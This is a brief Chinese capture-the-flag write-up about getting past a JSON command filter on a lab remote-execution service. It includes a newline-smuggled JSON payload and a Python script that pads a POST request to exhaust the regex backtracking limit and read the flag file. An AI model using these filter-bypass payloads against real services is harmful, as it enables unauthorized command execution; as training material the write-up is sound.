打开题目
它给出了提示要求json格式,先尝试一下{"cmd":"ls"}
的确可以执行。接下来就记录过滤了那些关键字。发现键盘上有的特殊符号好像都被过滤。
flag在home目录下,不知道为什么find命令返回为空。。。
cat在这里仍然不能用。应该是环境变量配置被改变,所以需要使用/bin/cat调用命令
{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0A}
利用回溯次数绕过 ,post请求
gei请求会因为头太大而报错
代码:
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag ","nayi":"' + "a"*(1000000) + '"}' #超过一百万,这里写一千万不会出结果。
res = requests.post("ip", data={"cmd":payload})
print(res.text)
python里面运行出结果
